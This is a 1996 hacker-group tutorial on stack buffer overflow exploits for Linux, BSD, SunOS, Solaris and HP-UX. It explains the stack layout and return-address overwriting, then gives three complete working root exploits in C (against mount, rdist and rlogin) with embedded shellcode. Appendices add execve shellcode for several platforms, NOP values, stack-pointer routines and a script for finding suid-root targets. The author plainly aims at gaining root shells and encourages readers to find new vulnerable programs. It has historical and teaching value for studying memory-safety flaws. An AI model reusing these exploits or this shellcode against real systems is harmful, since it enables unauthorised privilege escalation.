added unreleased README

[oweals/thc-archive.git] / Papers / overflow.txt

-------------------------------------------------------------------------------\r
 øSTACK OVERFLOW EXPLOiTS ON LiNUX/BSDOS/FREEBSD/SUNOS/SOLARiS/HP-UXø\r
-------------------------------------------------------------------------------\r
\r
 øintroductionø\r
 ~~~~~~~~~~~~\r
 welcome to the world of stack overflows, actually i planned an article\r
 explaining the complete operation of stack overflows on pc based unix\r
 systems, but as i read the new phrack magazine issue #49 i realized that\r
 somebody else had already written this article. well, if you want to learn\r
 more about the backgrounds (assembler programming/debugging) of stack\r
 overflows on linux systems and want to read an excellent article get the\r
 latest phrack magazine issue #49, article 14 by aleph one, the most com-\r
 plete article i have ever seen, great job! (phrack49.zip)\r
 but if you are not interested in understanding hundreds of lines pure\r
 i80386 (disassembled) assembler code and want to have a more practical\r
 guide, continue reading this article in order to easily learn how to use\r
 overflow exploits on various unix systems.\r
\r
\r
 øcontentsø\r
 ~~~~~~~~\r
                  [øaø]    øthe stack - small backgroundø\r
                  [øbø]    østructure of the stackø\r
                  [øcø]    øabusing the return adressø\r
                  [ødø]    øexecuting a shell in assemblerø\r
                  [øeø]    øgetting the real stack adressø\r
                  [øfø]    øenvironment/command line variablesø\r
                  [øgø]    øclosing wordsø\r
\r
           exploit[ø1ø]    ømount.c  - linux version: < 2.0.8ø\r
           exploit[ø2ø]    ørdist.c  - all bsd version: 2.0ø\r
           exploit[ø3ø]    ørlogin.c - solaris version: 2.5 & 2.5.1ø\r
\r
          appendix[øAø]    øasm and c code for executionø\r
          appendix[øBø]    ønop commands for different systemsø\r
          appendix[øCø]    øget_sp() for different systemsø\r
          appendix[øDø]    øfindsuid.sh - shellscriptø\r
\r
\r
 [øaø] øthe stack - small backgroundø\r
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r
 the main function of every CPU is processing and moving of data. while\r
 processing or moving the CPU needs a place to fast save important\r
 information due the limited space of the registers. these information\r
 are saved to the stack. the stack is a special part of the memory that\r
 can be accessed with special and very fast commands. the stack is variable\r
 in length and position.\r
\r
 e.g. if a register N is used and a sub-procedure is executed that also\r
      uses the register N the CPU will save the value of the register N\r
      onto the stack and restore it after the procedure has terminated. in\r
      order to improve the speed of this process, the CPU uses the special\r
      stack commands that are faster than normal movings in memory.\r
 e.g. if a procedure is executed the CPU needs to know where to return to\r
      if the procedure is terminated, the return adress is saved on the\r
      stack before executing the procedure and after terminatig the proce-\r
      dure the CPU jumps to the return adress stored on the stack.\r
\r
 there is a second function of the stack. if a program creates or receives\r
 data, the new data field will be stored in the memory, all programs use\r
 dynamic data fields to store such information. the CPU creates such fields\r
 on the stack if they are needed and removes them if they are not needed\r
 anymore, local variables or arrays are dynamic.\r
\r
 e.g. if a procedure should exchange two variables (a <-> b), it needs a\r
      third variable c to store one value:       c <- a\r
                                                 a <- b\r
                                                 b <- c\r
      the variable c would be installed on the stack and removed after the\r
      procedure has terminated.\r
\r
 for sure you now remember my introducing words promising something like\r
 "easily creating exploits without learning all the shit behind". well,\r
 i'm sorry but you have to know some of the backgrounds, and i try to\r
 explain these as simple as possible. (i could have explained everything\r
 in assembler code ;]\r
\r
\r
 [øbø] øthe structure of the stackø\r
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r
 the stack is structured in a way that confuses some people sometimes (like\r
 me), the first stored value will be read as last and the last stored value\r
 will be read as first, this system is called "last in, first out" or LIFO.\r
 now let's take a closer look at the stack, imagine we have just executed\r
 a procedure in a program (just to keep your interest: we will later do\r
 this to gain r00t privileges). how does the stack look like if the\r
 procedure needs some own local (dynamic) variables?\r
                          .\r
                          .\r
                          :   ...                 .  .\r
                          |-----------------------:\r
             -2048 bytes  |   local array1[1024]  |  ...\r
                          |-----------------------|\r
             -1024 bytes  |   local array2[1024]  |  size 1024 bytes\r
                          |-----------------------|\r
   actual stack position  |   base pointer        |  size 4 bytes\r
                          |-----------------------|\r
                +4 bytes  |   return adress       |  size 4 bytes\r
                          |-----------------------|\r
                +4 bytes  :   parameters ...      |  ...\r
                          .                       :\r
                                                  .  .\r
\r
 as you see the different mentioned variables and information are stored on\r
 the stack. every CPU uses a stack pointer to mark the actual position, it\r
 is called SP. the interesting parts of the stack are the local array2 and\r
 the return adress, we don't care about the rest because we want to gain\r
 r00t access and that is all.\r
\r
\r
 [øcø] øabusing the return adressø\r
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r
 as you remember before executing a procedure the CPU saves a return adress\r
 onto stack, if the procedure terminates the CPU will jump to the return\r
 adress and continue. but if procedure writes more bytes to a local vari-\r
 able as its size it will overwrite the return adress and this is called\r
 overflow.\r
\r
 e.g. if (1024+8) 1032 times the character "X" is written to the local\r
      array2 in the picture above, the procedure will overwrite its own\r
      return adress. and the stack will look like this:\r
                          .\r
                          .\r
                          :   ...                 .  .\r
                          |-----------------------:\r
             -2048 bytes  |   local array1[1024]  |  ...\r
                          |-----------------------|\r
             -1024 bytes  |   1024 times "X"      |  size 1024 bytes\r
                          |-----------------------|\r
   actual stack position  |      4 times "X"      |  size 4 bytes\r
                          |-----------------------|\r
                +4 bytes  |      4 times "X"      |  size 4 bytes\r
                          |-----------------------|\r
                +4 bytes  :   parameters ...      |  ...\r
                          .                       :\r
                                                  .  .\r
\r
 instead of writing the character "X" onto the return adress, we could\r
 write a new adress onto the stack, we would now force the program to jump\r
 to where we want!\r
 it would be very clever if we jump to an adress where we have placed\r
 some own assembler code that will do something interesting (what do you\r
 guess?), we could create this assembler code in the local variable; in\r
 the example local array2:\r
                          .\r
                          .\r
                          :   ...                 .\r
                          |-----------------------:\r
             -2048 bytes  |   local array1[1024]  |\r
                          |-----------------------|\r
             -1024 bytes  |   our code            | < -\r
                          |-----------------------|    |\r
   actual stack position  |   4 bytes of crap     |    |\r
                          |-----------------------|    |\r
                +4 bytes  |   adress of our code  | ___|\r
                          |-----------------------|\r
                +4 bytes  :   parameters ...      |\r
                          .                       :\r
                                                  .\r
\r
 if the program is owned by r00t and has the suid flag so that a normal\r
 user can execute it and it will give the user r00t privileges as long\r
 as it is executed, our code could do something with r00t privilegs!\r
 but what?\r
\r
 [ødø] øexecuting a shell in assemblerø\r
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r
 if our code would execute a normal shell and we have created the over-\r
 flow in a program with the suid flag and it is owned by the r00t we would\r
 have a complete r00t shell and the system would finally be hacked. what\r
 we need right now is a short assembler code that will execute a shell,\r
 well it is not necessary to execute a shell you can also execute any other\r
 program.\r
 you can find the corresponding assembler code for the different systems\r
 in the appendix [A] in pure assembler and compiled in a c char field\r
 called "execshell".\r
 if you still want to know how to disassemble such a code read article 14\r
 of the phrack magazine #49 or contact me via email. "/bin/sh" has been\r
 added to the code in most cases (exceptions: sparc code), if you want to\r
 execute a different program just change the char field.\r
 in order to guarantee our code to function we copy it and lots of nops in\r
 the data field that will later be copied to the local variable. (nop is\r
 a shortform of "no operation"). this data field need to be bigger than the\r
 local variable in order to overwrite the return adress. in the following\r
 example lv_size is the size of the local variable we want to overflow and\r
 buffer is the name of the data field (that is also local).\r
\r
 e.g. #define lv_size=1024\r
      char buffer[lv_size+8]\r
\r
 we add exactly 8 bytes, take a closer look at the stack above and youl\r
 will know why. if we want to overwrite the return adress we have to over-\r
 write 4 bytes base pointer and 4 bytes return adress.\r
 the data field buffer should look like this:\r
\r
     ...  <nop> <nop> <nop> <nop> <nop> <code executing a shell>\r
\r
 look at this c code in order to learn how we can do this, lv_size is a\r
 shortform of local variable size, execshell is the char field with our\r
 assembler code and the path of the shell we want to execute. ptr is a\r
 pointer to the field that we will copy over the local variable.\r
\r
 e.g. the easy version:   for(i=0;i<lv_size-strlen(execshell);i++)\r
                           ptr[i]=0x90;\r
                          for(i=0;i<strlen(execshell);i++)\r
                           ptr[i+lv_size-strlen(execshell)]=execshell[i];\r
\r
 e.g. the elegant way:    memset(ptr,0x90,lv_size-strlen(execshell));\r
                          ptr+=lv_size-strlen(execshell);\r
                          for(i=0;i<strlen(execshell);i++)\r
                           *(ptr++)=execshell[i];\r
\r
 these examples are designed for pc based unix system because they use\r
 0x90 which is the code for a nop command, on other platforms you have to\r
 use other codes for nops. i have included several codes for nops, take\r
 a look at appendix [B].\r
 i will use the easy version in my exploits because i'm not a professional\r
 c coder and i prefer indexing like it is used in assembler. now we have\r
 filled the buffer with our code and some nops and we are finally near our\r
 goal, becoming r00t.\r
\r
 [øeø] øgetting the real stack adressø\r
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r
 do you remember that the stack is variable in position and in length?\r
 if not, read [b] to fresh up your brain. we use a small function to get\r
 the actual stack adress by saving SP, this adress is the beginning of\r
 the stack before installing the local variables and the return adress,\r
 i will called it old SP (OSP) in the example.\r
 we have to add a variable offset to the OSP, this offset has to be that\r
 large that the CPU hits a nop when jumping to the return adress.\r
                          .\r
                          .                       .\r
                          :                       .\r
                   OSP -> |-----------------------:        ------\r
             -2048 bytes  |   local array1[1024]  |              | offset\r
                          |-----------------------|              | larger\r
             -1024 bytes  |   <...>               |              | than\r
                          |   <nop>               |              | 1024\r
                          |   <nop>               |        ______|\r
                          |   <nop>               | < -   OSP + offset\r
                          |   <nop>               |    |\r
                          |   <our code>          |    |\r
                          |-----------------------|    |\r
   actual stack position  |   4 bytes of crap     |    |\r
                          |-----------------------|    |\r
                +4 bytes  |   adress: OSP+offset  | ___|\r
                          |-----------------------|\r
                +4 bytes  :   parameters ...      |\r
                          .                       :\r
                                                  .\r
 in the example we have a local variable in front of the manipulated\r
 variable, so we have to generate an offset that is larger than the size\r
 of this variable.\r
 in order to get the SP value, we use a function called get_sp(), of cause\r
 there are different methods to get this value on different unix system,\r
 i have included several versions in appendix [C]. ptr2 is a long or dword\r
 pointer to ptr which points to the return adress in the buffer.\r
\r
 e.g. the correct code: ptr2=(long *)ptr;\r
                        *ptr2=get_sp()+offset;\r
\r
 e.g. the robust code:  ptr2=(long *)ptr;\r
                        for(i=1;i<8;i++)\r
                        *(ptr2++)=get_sp()+offset;\r
\r
 i will use the robust code in my exploits because it writes the return\r
 adress 8 times to the stack, if our estimated stack adress is wrong,\r
 we have still 7 other places where it could jump to.\r
\r
 [øfø] øenvironment/command line variablesø\r
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r
 you are for sure now tired of all this basic and theoratical stuff, you\r
 are right, it is time to find a target and attack it. the program that\r
 should be attacked has to be owned by root and has to be set suid. if\r
 you want to find some of these programs just use the the findsuid shell\r
 in appendix[D].\r
 if you have read the upper text parts carefully you now know how to over-\r
 flow the stack by using a local variable, but how can i detect that a\r
 program is vunerable to the overflow bug? there are two main ways of\r
 passing variables to a program the command line and environment variables.\r
\r
 e.g. command line variable: cat /test.file\r
                                 ^ variable (type: char[256])\r
\r
 after loading the machine code of the program and executing the first\r
 procedures the program will copy the command line into a buffer, if there\r
 is no size check you can use the command line to overflow the stack, in\r
 order to find out the size of the command line variable try some chars on\r
 the command line. (e.g. 1024+4, 256+4, 512+4,...) if the program reports\r
 "segmentation fault", you can use the program to get r00t access. of cause\r
 their exist programs with really huge command line e.g. 8000 bytes. if you\r
 have generated a list of suid/root files on your system, just try if there\r
 are vunerable on their command line. the second possibilty is to pass the\r
 variable by using an environment variable.\r
\r
 e.g. environment variable:  set TERM=1234\r
\r
 the program will copy the evironment variable TERM to a buffer, but the\r
 size of this buffer can be different, in order to overflow it you need\r
 to check sizes like 256, 512, 1024, 2048 and so on. to find out which\r
 programs use environment variables is not that easy, of cause you can\r
 guess that some programs need to read system information from the en-\r
 viroment variables but the best way to find out is to look inside the\r
 c source files.\r
 In any case try to find out new vulnerable programs, because it is always\r
 better to use exploits that are not common and known to the huge crowd of\r
 lame exploit abusers.\r
\r
 [øgø] øclosing wordsø\r
 ~~~~~~~~~~~~~~~~~\r
 after reading all this timewasting crap you should be able to generate\r
 overflow exploits yourself, as a small demonstration i included three\r
 sample exploits (which work). I modified the original sources so they've\r
 got the same variable names as in the examples so that it should be easy for\r
 you to understand the code.\r
\r
 exploits:           exploit[1]  mount.c  - linux version: < 2.0.8\r
                     exploit[2]  rdist.c  - all bsd version: 2.0\r
                     exploit[3]  rlogin.c - solaris version: 2.5 & 2.5.1\r
\r
 you have an undefined feeling in your stomach; if you want to complain\r
 about this article, if you want to flame or diss me, if you want to have\r
 more information, if you want to swap things or if you just want to leave\r
 a useless mail, feel free to contact me via e-mail...\r
 PLASMOID@USA.NET and soon on the THC server PLASMOID@INSECURITY.ORG\r
 if you are not linked to the internet contact me at the LORE BBS by van\r
 hauser/thc. you can also contact me via IRC i'm normally in the channel\r
 #bluebox if my account is not k-lined ;)\r
\r
                                                       - plasmoid/thc/deep\r
                                                       The Hacker's Choice\r
                                             Drinking Evil Elite Phreakers\r
\r
 plasmoid deep/thc <plasmoid@usa.net>\r
\r
 -----BEGIN PGP PUBLIC KEY BLOCK-----\r
 Version: 2.6.3i\r
 mQCNAzJZDKwAAAEEANBXUFXqCzZLKuPj7OwB5O7thWOHlzzsi6SEZfsbiysPU4TL\r
 AMsBuCV4257Rr0//aEMt4CWjAkO3YWcBzBMvGQIDhT06v9SB4LZep6wJlSIsFK3v\r
 L1x+iYzSlvoXOHYSBcjoXA3sDm+kzz49to77Z20bJru7upjHD8iQeMWdAg+hAAUR\r
 tBtwbGFzbW9pZCA8cGxhc21vaWRAdXNhLm5ldD6JAJUDBRAyWQysyJB4xZ0CD6EB\r
 AQ6GBACB1n9DkgHfnC7D245MZPpacEHI8Jwj0DV6inV19E9qWf4VDdXA8+9YLuUV\r
 hsV1/WRX3sJWGWmAQASPitl2tc+7vWw6VC4gjif1XsRttIuNwmvU+DPY7ZULueFe\r
 bKoLI2zXsnWm/+8PMjc6GSYsNrXSpUjqkH6nIt6+sytm2QyWBw==\r
 =Vbcq\r
 -----END PGP PUBLIC KEY BLOCK-----\r
\r
\r
 øexploitø[ø1ø]\r
 ~~~~~~~~~~\r
 /* -------------------------------------------------------------------------\r
    mount.c - mount exploit for linux - version: < 2.0.10\r
    discovered by bloodmask&vio/couin\r
    coded by plasmoid/thc/deep for thc-magazine issue #3\r
    12/12/96 - works also on umount\r
    ------------------------------------------------------------------------- */\r
\r
 #include <stdio.h>\r
\r
 #define lv_size  1024\r
 #define offset     30+lv_size+8*4\r
 // -------------------------------------------------------------------------\r
 long get_sp()\r
 {\r
   __asm__("movl %esp, %eax");\r
 }\r
 // -------------------------------------------------------------------------\r
 main(int argc, char **argv)\r
 {\r
   char execshell[] =\r
          "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"\r
          "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"\r
          "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";\r
\r
  char buffer[lv_size+4*8];\r
  unsigned long *ptr2 = NULL;\r
  char           *ptr = NULL;\r
  int           i;\r
\r
  for(i=0;i<lv_size+4*8;i++)\r
   buffer[i]=0x00;\r
  ptr=buffer;\r
\r
  for(i=0;i<lv_size-strlen(execshell);i++)\r
   *(ptr++)=0x90;\r
  for(i=0;i<strlen(execshell);i++)\r
   *(ptr++)=execshell[i];\r
  ptr2=(long *)ptr;\r
  for(i=1;i<2;i++)\r
   *(ptr2++)=get_sp()+offset;\r
\r
  printf("discovered by bloodmask&vio/couin\ncoded by plasmoid/thc/deep\nfor thc-magazine issue #3\n");\r
  (void)alarm((int)0);\r
  execl("/bin/mount", "mount", buffer, NULL);\r
 }\r
\r
\r
 øexploitø[ø2ø]\r
 ~~~~~~~~~~\r
 /* -------------------------------------------------------------------------\r
    rdist.c - rdist exploit for freebsd & bsd/os - version: 2.0\r
    discovered by brian mitchell\r
    coded by plasmoid/thc/deep for thc-magazine issue #3\r
    12/12/96\r
    ------------------------------------------------------------------------- */\r
\r
 #include <stdio.h>\r
\r
 #define lv_size   256\r
 #define offset     30+lv_size+8*4\r
 // -------------------------------------------------------------------------\r
 long get_sp()\r
 {\r
   __asm__("movl %esp, %eax");\r
 }\r
 // -------------------------------------------------------------------------\r
 main(int argc, char **argv)\r
 {\r
  char execshell[]=\r
         "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"\r
         "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"\r
         "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"\r
         "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";\r
\r
  char buffer[lv_size+4*8];\r
  unsigned long *ptr2 = NULL;\r
  char           *ptr = NULL;\r
  int           i;\r
\r
  for(i=0;i<lv_size+4*8;i++)\r
   buffer[i]=0x00;\r
  ptr=buffer;\r
\r
  for(i=0;i<lv_size-strlen(execshell);i++)\r
   *(ptr++)=0x90;\r
  for(i=0;i<strlen(execshell);i++)\r
   *(ptr++)=execshell[i];\r
  ptr2=(long *)ptr;\r
  for(i=1;i<2;i++)\r
   *(ptr2++)=get_sp()+offset;\r
\r
  printf("discovered by brian mitchell\ncoded by plasmoid/thc/deep\nfor thc-magazine issue #3\n");\r
  execl("/usr/bin/rdist", "rdist", "-d", buffer, "-d", buffer, NULL);\r
 }\r
\r
\r
 øexploitø[ø3ø]\r
 ~~~~~~~~~~\r
/*\r
 * rlogin-exploit.c: gets a root shell on most Solaris 2.5/2.5.1 machines\r
 * by exploiting the gethostbyname() overflow in rlogin.\r
 *\r
 * gcc -o rlogin-exploit rlogin-exploit.c\r
 *\r
 * Jeremy Elson, 18 Nov 1996\r
 * jeremy.elson@nih.gov\r
 */\r
\r
#include <stdio.h>\r
#include <stdlib.h>\r
#include <sys/types.h>\r
#include <unistd.h>\r
\r
#define BUF_LENGTH      8200\r
#define EXTRA           100\r
#define STACK_OFFSET    4000\r
#define SPARC_NOP       0xa61cc013\r
\r
u_char sparc_shellcode[] =\r
"\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"\r
"\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"\r
"\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"\r
"\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"\r
"\x82\x10\x20\x3b\x91\xd4\xff\xff";\r
\r
u_long get_sp(void)\r
{\r
  __asm__("mov %sp,%i0 \n");\r
}\r
\r
void main(int argc, char *argv[])\r
{\r
  char buf[BUF_LENGTH + EXTRA];\r
  long targ_addr;\r
  u_long *long_p;\r
  u_char *char_p;\r
  int i, code_length = strlen(sparc_shellcode);\r
\r
  long_p = (u_long *) buf;\r
\r
  for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)\r
    *long_p++ = SPARC_NOP;\r
\r
  char_p = (u_char *) long_p;\r
\r
  for (i = 0; i < code_length; i++)\r
    *char_p++ = sparc_shellcode[i];\r
\r
  long_p = (u_long *) char_p;\r
\r
  targ_addr = get_sp() - STACK_OFFSET;\r
  for (i = 0; i < EXTRA / sizeof(u_long); i++)\r
    *long_p++ = targ_addr;\r
\r
  printf("Jumping to address 0x%lx\n", targ_addr);\r
\r
  execl("/usr/bin/rlogin", "rlogin", buf, (char *) 0);\r
  perror("execl failed");\r
}\r
\r
\r
 øappendixø[øAø]\r
 ~~~~~~~~~~~\r
-------------------------------------------------------------------------------\r
 linux/i80386+\r
-------------------------------------------------------------------------------\r
 assembler code:\r
 ~~~~~~~~~~~~~~\r
                jmp    end_of_code\r
 execve:        popl   %esi\r
                movl   %esi,0x8(%esi)\r
                xorl   %eax,%eax\r
                movb   %eax,0x7(%esi)\r
                movl   %eax,0xc(%esi)\r
                movb   $0xb,%al\r
                movl   %esi,%ebx\r
                leal   0x8(%esi),%ecx\r
                leal   0xc(%esi),%edx\r
                int    $0x80\r
                xorl   %ebx,%ebx\r
                movl   %ebx,%eax\r
                inc    %eax\r
                int    $0x80\r
 end_of_code:   call   exec_prog\r
                .string "/bin/sh\"\r
\r
 string for c code:\r
 ~~~~~~~~~~~~~~~~~~\r
 char execshell[] =\r
        "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"\r
        "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"\r
        "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";\r
\r
-------------------------------------------------------------------------------\r
 bsd/os/i80386+ and freebsd/i80386+\r
-------------------------------------------------------------------------------\r
 assembler code:\r
 ~~~~~~~~~~~~~~~\r
                jmp     end_of_code\r
 execve:        popl    %esi\r
                leal    (%esi), %ebx\r
                movl    %ebx, 0x0b(%esi)\r
                xorl    %edx, %edx\r
                movl    %edx, 7(%esi)\r
                movl    %edx, 0x0f(%esi)\r
                movl    %edx, 0x14(%esi)\r
                movb    %edx, 0x19(%esi)\r
                xorl    %eax, %eax\r
                movb    $59, %al\r
                leal    0x0b(%esi), %ecx\r
                movl    %ecx, %edx\r
                pushl   %edx\r
                pushl   %ecx\r
                pushl   %ebx\r
                pushl   %eax\r
                jmp     bewm\r
 end_of_code:   call    execve\r
                .string   '/bin/sh'\r
                .byte   1, 1, 1, 1\r
                .byte   2, 2, 2, 2\r
                .byte   3, 3, 3, 3\r
 bewm:          .byte   0x9a, 4, 4, 4, 4, 7, 4\r
\r
 string for c code:\r
 ~~~~~~~~~~~~~~~~~~\r
 char execshell[]=\r
        "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"\r
        "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"\r
        "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"\r
        "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";\r
\r
\r
\r
------------------------------------------------------------------------------\r
 solaris/sparc processor\r
------------------------------------------------------------------------------\r
 assembler code:\r
 ~~~~~~~~~~~~~~~\r
                sethi   0xbd89a, %l6\r
                or      %l6, 0x16e, %l6\r
                sethi   0xbdcda, %l7\r
                and     %sp, %sp, %o0\r
                add     %sp, 8, %o1\r
                xor     %o2, %o2, %o2\r
                add     %sp, 16, %sp\r
                std     %l6, [%sp - 16]\r
                st      %sp, [%sp - 8]\r
                st      %g0, [%sp - 4]\r
                mov     0x3b, %g1\r
                ta      8\r
                xor     %o7, %o7, %o0\r
                mov     1, %g1\r
                ta      8\r
\r
 string for c code:\r
 ~~~~~~~~~~~~~~~~~~\r
 char execshell[59]=\r
        0x2d,0x0b,0xd8,0x9a,0xac,0x15,0xa1,0x6e,0x2f,0x0b,0xdc,0xda,0x90,\r
        0x0b,0x80,0x0e,0x92,0x03,0xa0,0x08,0x94,0x1a,0x80,0x0a,0x9c,0x03,\r
        0xa0,0x10,0xec,0x3b,0xbf,0xf0,0xdc,0x23,0xbf,0xf8,0xc0,0x23,0xbf,\r
        0xfc,0x82,0x10,0x20,0x3b,0x91,0xd0,0x20,0x08,0x90,0x1b,0xc0,0x0f,\r
        0x82,0x10,0x20,0x01,0x91,0xd0,0x20,0x08";\r
\r
  optional version:\r
  char execshell[54]=\r
            0x9fc0202c,0xc0247ff5,0xe227bff0,0xc027bff4,0x9207bff0,0x901d200a,\r
            0x901a200a,0x8210203b,0x91d02008,0x82102001,0x91d02008,0xa3c3e004,\r
            "/bin/sh";\r
\r
\r
------------------------------------------------------------------------------\r
 sunos/sparc processor\r
------------------------------------------------------------------------------\r
 assembler code:\r
 ~~~~~~~~~~~~~~~\r
                sethi   0xbd89a, %l6\r
                or      %l6, 0x16e, %l6\r
                sethi   0xbdcda, %l7\r
                and     %sp, %sp, %o0\r
                add     %sp, 8, %o1\r
                xor     %o2, %o2, %o2\r
                add     %sp, 16, %sp\r
                std     %l6, [%sp - 16]\r
                st      %sp, [%sp - 8]\r
                st      %g0, [%sp - 4]\r
                mov     0x3b, %g1\r
                mov     -0x1, %l5\r
                ta      %l5 + 1\r
                xor     %o7, %o7, %o0\r
                mov     1, %g1\r
                ta      %l5 + 1\r
\r
 string for c code:\r
 ~~~~~~~~~~~~~~~~~~\r
 char execshell[63]=\r
        0x2d,0x0b,0xd8,0x9a,0xac,0x15,0xa1,0x6e,0x2f,0x0b,0xdc,0xda,0x90,\r
        0x0b,0x80,0x0e,0x92,0x03,0xa0,0x08,0x94,0x1a,0x80,0x0a,0x9c,0x03,\r
        0xa0,0x10,0xec,0x3b,0xbf,0xf0,0xdc,0x23,0xbf,0xf8,0xc0,0x23,0xbf,\r
        0xfc,0x82,0x10,0x20,0x3b,0xaa,0x10,0x3f,0xff,0x91,0xd5,0x60,0x01,\r
        0x90,0x1b,0xc0,0x0f,0x82,0x10,0x20,0x01,0x91,0xd5,0x60,0x01";\r
\r
------------------------------------------------------------------------------\r
 hp-ux9/hp9000\r
------------------------------------------------------------------------------\r
 string for c code:\r
 ~~~~~~~~~~~~~~~~~~\r
 char execshell[]=\r
        "\x34\x59\x01\x02\x34\x5a\x01\x32\x37\x5a\x3e\xf9\x6b\x3a\x3f\x01"\r        "\x63\x40\x3f\xff\x34\x5a\x01\x38\x63\x40\x3f\x35\x37\x5a\x3e\xf9"\r
        "\x6b\x3a\x3f\x09\x63\x40\x3f\xff\x0b\x5a\x02\x9a\x6b\x3a\x3f\x11"\r
        "\x34\x5a\x01\x22\x37\x5a\x3e\xf9\x6f\x3a\x3e\xf9\x20\x20\x08\x01"\r
        "\x34\x16\x01\x1e\xe4\x20\xe0\x08\x36\xd6\x3e\xf9\x0b\x5a\x02\x9a"\r
        "\x20\x20\x08\x01\x34\x16\x01\x0a\xe4\x20\xe0\x08\x36\xd6\x3e\xf9"\r
        "\xe8\x5f\x1f\x35\x0b\x5a\x02\x9a\x01\x01\x01\x01\x01\x01\x01\x01"\r        "\x01\x01\x01\x01\x01\x01\x01\x01\x00/bin/sh";\r\r
 øappendixø[øBø]\r
 ~~~~~~~~~~~\r
-------------------------------------------------------------------------------\r
 no operation - nop - for the different systems\r
-------------------------------------------------------------------------------\r
 linux/i80386+                            -  char nop[1]=0x90;\r
 bsd/os/i80386+ and freebsd/i80386+       -  char nop[1]=0x90;\r
 solaris/sparc processor                  -  char nop[4]=0xac15a16e;\r
 sunos/sparc processor                    -  char nop[4]=0xac15a16e;\r
 hp-ux9/hp9000                            -  char nop[4]=0xac15a16e;\r
\r
 øappendixø[øCø]\r
 ~~~~~~~~~~~\r
-------------------------------------------------------------------------------\r
 linux/i80386+ and bsd/os/i80386+ and freebsd/i80386+\r
-------------------------------------------------------------------------------\r
 getting the stackpointer:\r
 ~~~~~~~~~~~~~~~~~~~~~~~~~\r
 long get_sp()\r
 {\r
  __asm__("movl %esp,%eax");\r
 }\r
\r
-------------------------------------------------------------------------------\r
 solaris/sparc processor and sunos/sparc processor\r
-------------------------------------------------------------------------------\r
 getting the stackpointer:\r
 ~~~~~~~~~~~~~~~~~~~~~~~~~\r
 long get_sp()\r
 {\r
  asm("or %sp, %sp, %i0");\r
 }\r
\r
 øappendixø[øDø]\r
 ~~~~~~~~~~\r
--------------------------------------------------------------------[cut here]-\r
 #!/bin/sh\r
 # findsuid.sh by plasmoid/thc/deep\r
 # important directories for linux system, try different ones\r
 # for other systems (/usr/etc, /usr/local/bin, /usr/local/etc, /usr/sbin)\r
 find /bin -user root -perm +a=s > suid.lst\r
 find /sbin -user root -perm +a=s >> suid.lst\r
 find /usr/bin -user root -perm +a=s >> suid.lst\r
 find /etc -user root -perm +a=s >> suid.lst\r
 find /var -user root -perm +a=s >> suid.lst\r
--------------------------------------------------------------------[cut here]-\r
\r
 <END OF FiLE - THC iN 1996>\r
\1a